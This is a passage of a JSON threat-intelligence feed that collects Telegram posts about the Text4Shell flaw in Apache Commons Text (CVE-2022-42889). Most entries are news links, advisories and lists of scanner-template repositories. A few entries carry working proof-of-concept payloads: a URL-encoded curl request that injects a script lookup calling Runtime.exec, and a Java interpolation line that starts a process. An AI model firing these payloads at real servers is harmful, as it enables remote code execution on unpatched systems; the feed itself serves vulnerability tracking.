\u0431\u043b\u0430\u0433\u043e \u043e\u043d\u0430 \u0443\u0436\u0435 \u0432\u044b\u0448\u043b\u0430.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0432\u0435\u0440\u0441\u0438\u0438 Apache Commons Text 1.5\u20131.9.\n\nReports:\nhttps://www.rapid7.com/blog/post/2022/10/17/cve-2022-42889-keep-calm-and-stop-saying-4shell/\nhttps://securitylab.github.com/advisories/GHSL-2022-018_Apache_Commons_Text/\nhttps://vulners.com/rapid7blog/RAPID7BLOG:F7BA3352D40FAE34A5EC64E58595ED85\nhttps://blog.aquasec.com/cve-2022-42889-text2shell-apache-commons-vulnerability", "creation_timestamp": "2022-10-19T09:07:24.000000Z"}, {"uuid": "af33625f-b999-4cee-9c69-d7e98f746b25", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "seen", "source": "https://t.me/ctinow/73306", "content": "Text4Shell (CVE-2022-42889) Vulnerability\n\nhttps://ift.tt/6DuHvlh", "creation_timestamp": "2022-11-03T19:47:17.000000Z"}, {"uuid": "49be04a5-bcd7-496e-a072-738d53fce9a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "seen", "source": "https://t.me/ctinow/70635", "content": "Experts warn of CVE-2022-42889 Text4Shell exploit attemptsSecurity Affairs - Security Affairs\n\nhttps://ift.tt/m4lWi1u", "creation_timestamp": "2022-10-22T07:37:00.000000Z"}, {"uuid": "4ff52a0d-a0a4-4a82-8ef3-bd0fe6337d4f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "seen", "source": "https://t.me/ctinow/72646", "content": "How to protect against CVE-2022-42889 | Text4Shell vulnerability protection | Contrast Security\n\nhttps://ift.tt/hyAJNQR", "creation_timestamp": "2022-11-01T15:32:31.000000Z"}, {"uuid": "2a242e9c-fbd3-472c-ad1e-713feff7475a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "seen", "source": "https://t.me/ctinow/70593", "content": "Experts warn of CVE-2022-42889 Text4Shell exploit attempts\n\nhttps://ift.tt/m4lWi1u", "creation_timestamp": "2022-10-21T22:56:40.000000Z"}, {"uuid": "c6f1f5c5-0683-47c2-9d19-e2c5a8b86d9d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "seen", "source": "https://t.me/ctinow/69961", "content": "Apache Commons Text flaw is not a repeat of Log4Shell (CVE-2022-42889)\n\nhttps://ift.tt/wPB29Av", "creation_timestamp": "2022-10-19T16:03:09.000000Z"}, {"uuid": "c959636d-9b17-4eea-9264-f17834551f17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "seen", "source": "https://t.me/ctinow/69891", "content": "CVE-2022-42889: Don\u2019t panic, do patch | Contrast Security - Security Boulevard\n\nhttps://ift.tt/WURrKzb", "creation_timestamp": "2022-10-19T06:26:53.000000Z"}, {"uuid": "0aa71d6a-e70b-4e63-80e3-67a37999c086", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "seen", "source": "https://t.me/ctinow/69872", "content": "CVE-2022-42889: Don\u2019t panic, do patch | Contrast Security - Security Boulevard\n\nhttps://ift.tt/WURrKzb", "creation_timestamp": "2022-10-19T05:06:22.000000Z"}, {"uuid": "7a8a40dc-dca9-4a0a-9b37-ed17023c6f96", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/MalaysiaHacktivistz/11836", "content": "Text4Shell-Exploit - A Custom Python-based Proof-Of-Concept (PoC) Exploit Targeting Text4Shell (CVE-2022-42889), A Critical Remote Code Execution Vulnerability In Apache Commons Text Versions < 1.10 \u2013 kitploit.com\n\nWed, 23 Apr 2025 20:30:00", "creation_timestamp": "2025-04-23T18:03:13.000000Z"}, {"uuid": "7a12af3b-c944-4b61-84c0-a954a4ba5095", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "seen", "source": "https://t.me/bizone_channel/630", "content": "\u26a1\ufe0f \u041a\u0430\u043a Log4Shell, \u043d\u043e \u043d\u0435 \u0441\u043e\u0432\u0441\u0435\u043c...\n\n\u041f\u043e\u043c\u043d\u0438\u0442\u0435 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Log4Shell? \u0413\u043e\u0434 \u043d\u0430\u0437\u0430\u0434 \u043e\u043d\u0430 \u0437\u0430\u0441\u0442\u0430\u0432\u0438\u043b\u0430 IT \u043f\u043e\u043d\u0435\u0440\u0432\u043d\u0438\u0447\u0430\u0442\u044c, \u0442\u0430\u043a \u043a\u0430\u043a \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u043b\u0430 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u0434 \u0432 \u0432\u0435\u0431-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f\u0445.\n\n\u0412 \u0441\u0435\u0440\u0435\u0434\u0438\u043d\u0435 \u043e\u043a\u0442\u044f\u0431\u0440\u044f \u0432 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0435 Apache Commons Text \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2022-42889 \u0441 \u0443\u0440\u043e\u0432\u043d\u0435\u043c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 9,8 \u0438\u0437 10. \u0418\u0437-\u0437\u0430 \u0441\u0445\u043e\u0434\u0441\u0442\u0432\u0430 \u0441 Log4Shell \u0441\u0440\u0435\u0434\u0438 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439\u00a0\u0435\u0435 \u043f\u0440\u043e\u0437\u0432\u0430\u043b\u0438 Text4Shell.\n\n\u041e\u0434\u043d\u0430\u043a\u043e, \u043f\u043e \u0434\u0430\u043d\u043d\u044b\u043c \u043d\u0435\u0437\u0430\u0432\u0438\u0441\u0438\u043c\u044b\u0445 \u0430\u043d\u0430\u043b\u0438\u0437\u043e\u0432, \u0447\u0442\u043e\u0431\u044b CVE-2022-42889 \u0441\u0440\u0430\u0431\u043e\u0442\u0430\u043b\u0430, \u0434\u043e\u043b\u0436\u043d\u0430 \u0431\u044b\u0442\u044c \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0430 \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0430, \u043d\u043e \u0438 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u0430\u044f \u0432\u0435\u0440\u0441\u0438\u044f JDK. \u041f\u043e\u044d\u0442\u043e\u043c\u0443, \u0432 \u043e\u0442\u043b\u0438\u0447\u0438\u0435 \u043e\u0442 Log4Shell, \u043d\u043e\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0435 \u0442\u0430\u043a \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430.\n\n\u0422\u0435\u043c \u043d\u0435 \u043c\u0435\u043d\u0435\u0435 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e Text4Shell \u0434\u0430\u0436\u0435 \u043d\u0435\u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u0439 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043b\u044e\u0431\u043e\u0439 \u043a\u043e\u0434, \u043d\u0430\u043f\u0440\u0430\u0432\u0438\u0432 \u0437\u0430\u043f\u0440\u043e\u0441 \u043d\u0430 \u0441\u0430\u0439\u0442.\n\n\u0417\u0430\u0449\u0438\u0442\u0438\u0442\u044c\u0441\u044f \u043e\u0442 \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u043c\u043e\u0436\u0435\u0442 BI.ZONE WAF. \u041d\u0430\u0448 \u0441\u0435\u0440\u0432\u0438\u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u044b \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u043f\u0435\u0440\u0435\u0434\u0430\u0432\u0430\u0435\u043c\u044b\u0445 \u0441\u0442\u0440\u043e\u043a, \u0447\u0442\u043e\u0431\u044b \u0434\u0435\u0442\u0435\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0438 \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0437\u0430\u043f\u0440\u043e\u0441\u044b, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0435 \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 Text4Shell.", "creation_timestamp": "2022-11-13T11:15:33.000000Z"}, {"uuid": "74128f02-828a-4efe-b21f-9f81d74453fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/MalaysiaHacktivistz/3587", "content": "Text4Shell-Exploit - A Custom Python-based Proof-Of-Concept (PoC) Exploit Targeting Text4Shell (CVE-2022-42889), A Critical Remote Code Execution Vulnerability In Apache Commons Text Versions < 1.10 \u2013 kitploit.com\n\nWed, 23 Apr 2025 20:30:00", "creation_timestamp": "2025-04-23T18:03:13.000000Z"}, {"uuid": "ca5a8388-7076-43dc-a940-053ebbbe553c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/AGENTZSECURITY/1250", "content": "https://github.com/abbycantcode/Nuclei-Template\nhttps://github.com/foulenzer/foulenzer-templates\nhttps://github.com/joanbono/nuclei-templates\nhttps://github.com/pacho15/mynuclei_templates\nhttps://github.com/themastersunil/Nuclei-TamplatesBackup.git\nhttps://github.com/themastersunil/nucleiDB\nhttps://github.com/trungkay2/Nuclei-template\nhttps://github.com/shubham-rooter/Nuclei-Template-Collection\nhttps://gist.github.com/0x240x23elu\nhttps://gist.github.com/ResistanceIsUseless/e46848f67706a8aa1205c9d2866bff31\nhttps://github.com/0x71rex/0-Nuclei-Templates\nhttps://github.com/0x727/ObserverWard_0x727\nhttps://github.com/0xAwali/Virtual-Host\nhttps://github.com/0xElkot/My-Nuclei-Templates\nhttps://github.com/0xKayala/Custom-Nuclei-Templates\nhttps://github.com/0xPugazh/my-nuclei-templates\nhttps://github.com/0xmaximus/final_freaking_nuclei_templates\nhttps://github.com/10kHacktech/nuclei_templates\nhttps://github.com/1in9e/my-nuclei-templates\nhttps://github.com/2jung/nuclei-templates\nhttps://github.com/5cr1pt/templates\nhttps://github.com/ARPSyndicate/kenzer-templates\nhttps://github.com/Akokonunes/Private-Nuclei-Templates\nhttps://github.com/Arvinthksrct/alltemplate\nhttps://github.com/AshiqurEmon/nuclei_templates.git\nhttps://github.com/BagheeraAltered/FuzzingTemplate\nhttps://github.com/BeRserKerSec/CVE-2021-26084-Nuclei-template\nhttps://github.com/CharanRayudu/Custom-Nuclei-Templates\nhttps://github.com/ChristianWeiler/custom-nuclei-templates\nhttps://github.com/Dalaho-bangin/my_nuclei_templates\nhttps://github.com/Dalaho-bangin/nuclei-templates2\nhttps://github.com/Deep2142004/Nuclei-Templates\nhttps://github.com/Deepparasiya/Nuclei-Templates\nhttps://github.com/DoubleTakes/nuclei-templates\nhttps://github.com/DrakenKun-cyber/Templates\nhttps://github.com/Elsfa7-110/log4jNuclei\nhttps://github.com/Elsfa7-110/mynuclei-templates\nhttps://github.com/Erenlancaster/CVE-2021-46704\nhttps://github.com/Esonhugh/public-nuclei-template\nhttps://github.com/ExpLangcn/NucleiTP\nhttps://github.com/Facucuervo87/openssl-3.0.4-template\nhttps://github.com/GlennPegden2/misc-nuclei-scripts\nhttps://github.com/Gotcha-1G/CVE-2022-42889\nhttps://github.com/Hack4rLIFE/CVE-2022-42889\nhttps://github.com/Harish4948/Nuclei-Templates\nhttps://github.com/HernanRodriguez1/ScanReflectedSSTI\nhttps://github.com/HideNsec/nuclei-bitrix-templates\nhttps://github.com/Hunt2behunter/nuclei-templates\nhttps://github.com/Jagomeiister/nuclei-templates\nhttps://github.com/JoshMorrison99/url-based-nuclei-templates\nhttps://github.com/Kaue-Navarro/Templates-kaue-nuclei\nhttps://github.com/KeepHowling/all_freaking_nuclei_templates\nhttps://github.com/Lopseg/nuclei-c-templates\nhttps://github.com/Lu3ky13/Authorization-Nuclei-Templates\nhttps://github.com/MR-pentestGuy/nuclei-templates\nhttps://github.com/MikeeI/nuclei-templates\nhttps://github.com/Mr-B0hl00l/nuclei-templates\nhttps://github.com/Mr-xn/CVE-2023-23333\nhttps://github.com/MrCl0wnLab/Nuclei-Template-CVE-2022-1388-BIG-IP-iControl-REST-Exposed\nhttps://github.com/MrCl0wnLab/Nuclei-Template-Exploit-F5-BIG-IP-iControl-REST-Auth-Bypass-RCE-Command-Parameter\nhttps://github.com/NightRang3r/misc_nuclei_templates\nhttps://github.com/NitinYadav00/My-Nuclei-Templates\nhttps://github.com/Odayex/Random-Nuclei-Templates\nhttps://github.com/Pavan-Alapati/nuclei-templates\nhttps://github.com/PedroFerreira97/nuclei_templates\nhttps://github.com/R-s0n/Custom_Vuln_Scan_Templates\nhttps://github.com/Rabb1ter/nuclei-templates\nhttps://github.com/RajaUzairAbdullah/nuclei-templates\nhttps://github.com/Red-Darkin/Custom-Nuclei-Templates\nhttps://github.com/Saboor-Hakimi/CVE-2023-23752\nhttps://github.com/Saimonkabir/Nuclei-Templates\nhttps://github.com/Saptak9983/Nuclei-Template\nhttps://github.com/SecTheBit/CVE-2022-1388\nhttps://github.com/Shakilll/my_nuclei_templates\nhttps://github.com/ShangRui-hash/my-nuclei-templates", "creation_timestamp": "2025-04-22T02:52:21.000000Z"}, {"uuid": "72425e94-edb9-447c-af80-d617d354fe07", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/TengkorakCyberCrewzz/30251", "content": "Text4Shell-Exploit - A Custom Python-based Proof-Of-Concept (PoC) Exploit Targeting Text4Shell (CVE-2022-42889), A Critical Remote Code Execution Vulnerability In Apache Commons Text Versions < 1.10 \u2013 kitploit.com\n\nWed, 23 Apr 2025 20:30:00", "creation_timestamp": "2025-04-23T18:03:13.000000Z"}, {"uuid": "d7125bc2-e543-43df-844b-585490227f01", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/AGENTZSECURITY/1244", "content": "wget https://raw.githubusercontent.com/SecTheBit/CVE-2022-1388/main/bigip.yaml\nhttps://github.com/rafaelwdornelas/my-nuclei-templates\nhttps://github.com/Akokonunes/Private-Nuclei-Templates\nhttps://github.com/trungkay2/Nuclei-template\nhttps://github.com/Kaue-Navarro/Templates-kaue-nuclei\nhttps://github.com/1dayluo/My-Nuclei-Templates\nhttps://github.com/topscoder/nuclei-wordfence-cve\nhttps://github.com/drfabiocastro/certwatcher-templates\nhttps://github.com/erickfernandox/nuclei-templates\nhttps://github.com/damon-sec/Nuclei-templates-Collection\nhttps://github.com/ptyspawnbinbash/template-enhancer\nhttps://github.com/abbycantcode/Nuclei-Template\nhttps://github.com/ayadim/Nuclei-bug-hunter\nhttps://github.com/pacho15/mynuclei_templates\nhttps://github.com/soumya123raj/Nuclei\nhttps://github.com/soapffz/myown-nuclei-poc\nhttps://github.com/zer0yu/Open-PoC\nhttps://github.com/SumedhDawadi/Custom-Nuclei-Template\nhttps://github.com/coldrainh/nuclei-ByMyself\nhttps://github.com/binod235/nuclei-templates-and-reports\nhttps://github.com/mbskter/Masscan2Httpx2Nuclei-Xray\nhttps://github.com/luck-ying/Library-YAML-POC\nhttps://github.com/PedroFerreira97/nuclei_templates\nhttps://github.com/Odayex/Random-Nuclei-Templates\nhttps://github.com/Hunt2behunter/nuclei-templates\nhttps://github.com/mastersir-lab/nuclei-yaml-poc\nhttps://github.com/SirAppSec/nuclei-template-generator-log4j\nhttps://github.com/souzomain/mytemplates\nhttps://github.com/ricardomaia/nuclei-template-generator-for-wordpress-plugins\nhttps://github.com/0xPugazh/my-nuclei-templates\nhttps://github.com/UltimateSec/ultimaste-nuclei-templates\nhttps://github.com/h0tak88r/nuclei_templates\n# https://github.com/0XParthJ/Nuclei-Templates\n# https://github.com/1dayluo/My-Nuclei-Templates\n# https://github.com/Aituglo/nuclei-templates\n# https://github.com/ChiaraNRTT96/BountySkill\n# https://github.com/Linuxinet/nuclei-templates\n# https://github.com/Nithissh0708/Custom-Nuclei-Templates\n# https://github.com/abbycantcode/Nuclei-Template\n# https://github.com/foulenzer/foulenzer-templates\n# https://github.com/joanbono/nuclei-templates\n# https://github.com/pacho15/mynuclei_templates\n# https://github.com/themastersunil/Nuclei-TamplatesBackup.git\n# https://github.com/themastersunil/nucleiDB\n# https://github.com/trungkay2/Nuclei-template\n# https://github.com/shubham-rooter/Nuclei-Template-Collection\nhttps://github.com/0xElkot/My-Nuclei-Templates\nhttps://github.com/0xmaximus/final_freaking_nuclei_templates\nhttps://github.com/10kHacktech/nuclei_templates\nhttps://github.com/2jung/nuclei-templates\nhttps://github.com/Arvinthksrct/alltemplate\nhttps://github.com/BeRserKerSec/CVE-2021-26084-Nuclei-template\nhttps://github.com/ChristianWeiler/custom-nuclei-templates\nhttps://github.com/DoubleTakes/nuclei-templates\nhttps://github.com/Elsfa7-110/log4jNuclei\nhttps://github.com/ExpLangcn/NucleiTP\nhttps://github.com/Facucuervo87/openssl-3.0.4-template\nhttps://github.com/GlennPegden2/misc-nuclei-scripts\nhttps://github.com/Hack4rLIFE/CVE-2022-42889\nhttps://github.com/Jagomeiister/nuclei-templates\nhttps://github.com/KeepHowling/all_freaking_nuclei_templates\nhttps://github.com/Lopseg/nuclei-c-templates\nhttps://github.com/Lu3ky13/Authorization-Nuclei-Templates\nhttps://github.com/MikeeI/nuclei-templates\nhttps://github.com/MrCl0wnLab/Nuclei-Template-CVE-2022-1388-BIG-IP-iControl-REST-Exposed\nhttps://github.com/MrCl0wnLab/Nuclei-Template-Exploit-F5-BIG-IP-iControl-REST-Auth-Bypass-RCE-Command-Parameter\nhttps://github.com/NightRang3r/misc_nuclei_templates\nhttps://github.com/Saboor-Hakimi/CVE-2023-23752\nhttps://github.com/SecTheBit/CVE-2022-1388\nhttps://github.com/T4t4ru/nuclei-templates\nhttps://github.com/aels/CVE-2022-37042\nhttps://github.com/akincibor/CVE-2022-27925\nhttps://github.com/al4xs/nuclei-templates\nhttps://github.com/am0nt31r0/custom-nuclei-templates", "creation_timestamp": "2025-04-22T02:52:21.000000Z"}, {"uuid": "2f46fde5-a2cb-4750-84d4-2a39b7136a55", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "seen", "source": "https://t.me/arpsyndicate/1887", "content": "#ExploitObserverAlert\n\nCVE-2022-42889\n\nDESCRIPTION: Exploit Observer has 161 entries related to CVE-2022-42889. Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is \"${prefix:name}\", where \"prefix\" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - \"script\" - execute expressions using the JVM script execution engine (javax.script) - \"dns\" - resolve dns records - \"url\" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default.\n\nFIRST-EPSS: 0.612250000\nNVD-IS: 5.9\nNVD-ES: 3.9", "creation_timestamp": "2023-12-18T01:59:54.000000Z"}, {"uuid": "e564a8d1-9a97-4f21-903d-26ad24295ec4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "seen", "source": "https://t.me/arpsyndicate/4391", "content": "#ExploitObserverAlert\n\nCVE-2022-42889\n\nDESCRIPTION: Exploit Observer has 181 entries in 21 file formats related to CVE-2022-42889. Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is \"${prefix:name}\", where \"prefix\" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - \"script\" - execute expressions using the JVM script execution engine (javax.script) - \"dns\" - resolve dns records - \"url\" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default.\n\nFIRST-EPSS: 0.971500000\nNVD-IS: 5.9\nNVD-ES: 3.9", "creation_timestamp": "2024-04-09T05:10:50.000000Z"}, {"uuid": "a3b76df3-629a-4fd8-832d-9deefe928903", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/AnonCyberWarrior/408", "content": "Detecting and mitigating CVE-2022-42889 a.k.a. Text4shell \u2013 Sysdig\nhttps://sysdig.com/blog/cve-2022-42889-text4shell/", "creation_timestamp": "2022-10-24T07:47:56.000000Z"}, {"uuid": "f14923a2-8385-41b1-b9f6-8410338e276b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/netrunnerz/316", "content": "#CVE #POC\n\nText4Shell CVE-2022-42889\nCVE-2022-42889 Text4Shell affects Apache Commons Text versions 1.5 through 1.9. It has been patched as of Commons Text version 1.10. \n\nPOC:\ncurl http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.get.Runtime%28%29.exec%28%5C%27%27%2E%74%72%69%6D%28%24%63%6D%64%29%2E%27%5C%27%29%7D", "creation_timestamp": "2022-10-27T19:40:11.000000Z"}, {"uuid": "54ea5410-ac00-4022-bf7d-37c57f5c9ccc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "Telegram/0GfCOzXtqvFdrqIAVQZHiIyuC3I1uZNIHuukwGa3RPYAk8Y", "content": "", "creation_timestamp": "2025-03-24T22:00:08.000000Z"}, {"uuid": "52cfe614-a0fa-4622-af8c-681b0e734d38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/AnonCyberWarrior/378", "content": "Apache Text4Shell (CVE-2022-42889)\n\nPoC\ncurl http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.get.Runtime%28%29.exec%28%5C%27%27%2E%74%72%69%6D%28%24%63%6D%64%29%2E%27%5C%27%29%7D\n\nhttps://github.com/ClickCyber/cve-2022-42889\nhttps://sysdig.com/blog/cve-2022-42889-text4shell/", "creation_timestamp": "2022-10-21T21:02:12.000000Z"}, {"uuid": "0baf1f63-87c2-468c-b31f-b665dc296d4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "seen", "source": "https://t.me/AnonCyberWarrior/342", "content": "CVE-2022-42889, which some have begun calling \u201cText4Shell,\u201d is a vulnerability in the popular Apache Commons Text library that can result in code execution when processing malicious input. \n\nRead more & find mitigation guidance \u2935\ufe0f\n\nhttps://www.rapid7.com/blog/post/2022/10/17/cve-2022-42889-keep-calm-and-stop-saying-4shell/?utm_campaign=sm-blog&utm_source=twitter&utm_medium=organic-social", "creation_timestamp": "2022-10-20T13:40:42.000000Z"}, {"uuid": "f1bc73fb-d6b1-48ac-b374-1061cf83a6c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "seen", "source": "https://t.me/AnonCyberWarrior/341", "content": "Here is the thing called #text4shell. Probably the first thing you will care about after waking up tomorrow. CVE-2022-42889 with a CVSS score of 9.8.", "creation_timestamp": "2022-10-20T13:31:33.000000Z"}, {"uuid": "d45762b3-cec6-490e-9aab-413cdbef3055", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/freelearningtech/1461", "content": "Detecting and mitigating CVE-2022-42889 a.k.a. Text4shell \u2013 Sysdig\nhttps://sysdig.com/blog/cve-2022-42889-text4shell/", "creation_timestamp": "2022-10-21T20:37:57.000000Z"}, {"uuid": "95b21a50-34aa-4bd9-8c4f-52d13a210a2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/1074", "content": "CVE-2022-42889\nApache -  Commons Text library\nCVSS: 9.8 CRITICAL\n\u041f\u043e\u0447\u0438\u0442\u0430\u0442\u044c \u043f\u0440\u043e \u0434\u044b\u0440\u043a\u0443 \u0442\u0443\u0442\n\nPOC\nJava:\nStringSubstitutor.createInterpolator().replace(\"${script:js:new java.lang.ProcessBuilder(\\\"calc\\\").start()}\");\n\n\n#apache", "creation_timestamp": "2022-10-17T19:15:55.000000Z"}, {"uuid": "3fb5c82d-8265-4a49-89be-6f26ecf0cc0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-42889", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/1082", "content": "CVE-2022-42889\n\u041f\u043e\u0447\u0438\u0442\u0430\u0442\u044c \u043f\u0440\u043e \u0434\u044b\u0440\u043a\u0443 \u0442\u0443\u0442\n\u0421\u043a\u0430\u043d\u0435\u0440 \u0434\u044b\u0440\u043a\u0438 \u043d\u0430 \u043f\u0438\u0442\u043e\u043d\u0435 text4shell-tools\n\u0421\u043a\u0430\u043d\u0435\u0440 \u0434\u044b\u0440\u043a\u0438 \u0434\u043b\u044f BurpSuite burp-text4shell\n\u041f\u043e\u0438\u0433\u0440\u0430\u0442\u044c\u0441\u044f \u0441 \u0434\u044b\u0440\u043a\u043e\u0439 \u0432 \u0434\u043e\u043a\u0435\u0440\u0435 text4shell-docker\n\u0421\u0430\u043c POC\n\n#apache #exploit #poc", "creation_timestamp": "2022-10-19T10:57:35.000000Z"}, {"uuid": "e2306ad7-7a5c-40dc-9e1b-5e963d10d42c", 